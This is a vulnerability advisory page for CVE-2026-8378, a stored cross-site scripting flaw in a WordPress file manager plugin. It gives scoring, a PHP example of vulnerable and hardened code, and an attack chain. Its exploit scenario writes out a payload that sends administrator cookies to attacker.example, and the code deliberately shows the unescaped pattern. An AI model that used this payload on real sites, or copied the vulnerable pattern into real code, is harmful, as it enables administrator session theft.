
Frontend File Manager Plugin CVE-2026-8378

EUVD-2026-38419 · MEDIUM
2026-06-23 · WPScan · GHSA-v62r-5pwf-6945
CVSS 3.1 base score 5.4 · Vendor: WPScan

Severity by source

Vendor (WPScan), primary: 5.4 MEDIUM
AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N

vuln.today AI: 5.4 MEDIUM
PR:L confirmed by subscriber-level requirement; UI:R because admin must view listing; S:C reflects cross-context execution in admin session; no availability impact.

CVSS 3.1: AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
CVSS 4.0: AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N

Primary rating from Vendor (WPScan).

CVSS Vector (Vendor: WPScan)

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Attack Vector: Network
Attack Complexity: Low
Privileges Required: Low
User Interaction: Required
Scope: Changed
Confidentiality: Low
Integrity: Low
Availability: None

Lifecycle Timeline

Analysis Generated - Jun 23, 2026 13:24 (vuln.today)
CVSS changed - Jun 23, 2026 13:22 (NVD): 5.4 (MEDIUM)
CVE Published - Jun 23, 2026 06:00 (cve.org): MEDIUM 5.4
CVE Published - Jun 23, 2026 06:00 (cve.org): UNKNOWN (no severity yet)

Description (CVE.org)

The Frontend File Manager Plugin WordPress plugin through 23.6 does not sanitise nor escape a filename submitted to the frontend file-rename endpoint before storing it as post meta and rendering it back on the admin File Manager listing, leading to a Stored Cross-Site Scripting vulnerability exploitable by users with Subscriber-level access and above against an administrator viewing the file management interface.

Analysis (AI)

Stored Cross-Site Scripting in the Frontend File Manager Plugin for WordPress (versions through 23.6) allows any authenticated subscriber-level user to compromise administrator sessions by injecting malicious script payloads via the frontend file-rename endpoint. The unsanitized filename is persisted as post meta and subsequently rendered unescaped within the WordPress admin File Manager listing, triggering execution whenever an administrator views that interface. …
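The description and analysis above point at two missing controls: the submitted filename is not sanitised before it is stored as post meta, and it is not escaped when the admin listing renders it. The PHP below is an added illustration of that bug class and its fix, written for this page; it is not the plugin's code and does not claim to mirror its internals. The function names, the `_ffm_example_filename` meta key, the `ffm_example_rename` nonce action and the post-author ownership check are assumptions made for the example; the WordPress APIs it calls (`check_ajax_referer()`, `sanitize_file_name()`, `update_post_meta()`, `get_post_meta()`, `esc_html()`, `wp_send_json_*()`) are real.

```php
<?php
// Added example for CVE-2026-8378's bug class (stored XSS via an unsanitised,
// unescaped filename). Not the Frontend File Manager plugin's own code; the
// function names, meta key, nonce action and ownership rule are hypothetical.
// Runs inside WordPress (needs the core functions called below).

// --- Vulnerable pattern: store raw input, echo it back unescaped ---------

function ffm_example_rename_vulnerable() {
    $post_id  = (int) $_POST['post_id'];
    $new_name = $_POST['new_name'];          // raw, attacker-controlled string
    update_post_meta( $post_id, '_ffm_example_filename', $new_name );
}

function ffm_example_listing_row_vulnerable( $post_id ) {
    $name = get_post_meta( $post_id, '_ffm_example_filename', true );
    return '<td>' . $name . '</td>';         // lands in admin HTML unescaped
}

// --- Hardened pattern: authorise, sanitise on write, escape on output -----

function ffm_example_rename_hardened() {
    // Reject forged requests before touching any state.
    check_ajax_referer( 'ffm_example_rename', 'nonce' );

    $post_id = isset( $_POST['post_id'] ) ? (int) $_POST['post_id'] : 0;
    if ( ! $post_id || ! is_user_logged_in() ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // Hypothetical ownership rule: a user may only rename files they uploaded.
    // A real plugin would substitute its own authorisation model here.
    $owner = (int) get_post_field( 'post_author', $post_id );
    if ( $owner !== get_current_user_id() && ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }

    // sanitize_file_name() strips < > " ' & / \ and other characters that have
    // no place in a filename, which also removes the markup an XSS payload needs.
    $raw      = isset( $_POST['new_name'] ) ? wp_unslash( $_POST['new_name'] ) : '';
    $new_name = sanitize_file_name( $raw );
    if ( '' === $new_name ) {
        wp_send_json_error( 'invalid filename', 400 );
    }

    update_post_meta( $post_id, '_ffm_example_filename', $new_name );
    wp_send_json_success( array( 'name' => $new_name ) );
}

function ffm_example_listing_row_hardened( $post_id ) {
    $name = get_post_meta( $post_id, '_ffm_example_filename', true );
    // Escape at the point of output no matter what is stored: rows written
    // before the fix, or by another code path, are neutralised here too.
    return '<td>' . esc_html( $name ) . '</td>';
}

add_action( 'wp_ajax_ffm_example_rename', 'ffm_example_rename_hardened' );
```

The two fixes are independent and both are needed: sanitising on write keeps hostile strings out of the database, while escaping on output protects the administrator even when a value slipped in earlier or through a different path. For an installation that cannot yet update, the output-side escaping is the control that closes the exposure described in this record, because the admin listing is where the stored value executes.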


Attack Chain (AI-derived)

Hypothetical attack flow derived from CVE metadata

Access: Register or compromise subscriber account
Delivery: Submit malicious filename to file-rename endpoint
Exploit: Payload stored in WordPress post meta
Execution: Admin navigates to File Manager listing
Persist: Stored script executes in admin browser
Impact: Hijack admin session or create backdoor account

Vulnerability Assessment (AI)

Exploitation: Exploitation requires the attacker to hold at minimum a Subscriber-level WordPress account on the target site (PR:L per CVSS vector); sites with open user registration are therefore more broadly exposed than invitation-only or closed-registration installations. …

Risk Assessment: The CVSS 3.1 base score of 5.4 (Medium) with vector AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N accurately reflects the attack dynamics: low attack complexity, requiring only subscriber-level authentication and passive admin interaction. …

Exploit Scenario: An attacker registers or uses an existing subscriber-level WordPress account on the target site and submits a filename such as '><img src=x onerror=fetch(`https://attacker.example/steal?c=`+document.cookie)> to the frontend file-rename endpoint. The payload is stored in post meta without sanitization. …

Remediation: No vendor-released patch identified at time of analysis - no fixed version appears in available intelligence sources. …



CVE-2026-8378 vulnerability details – vuln.today
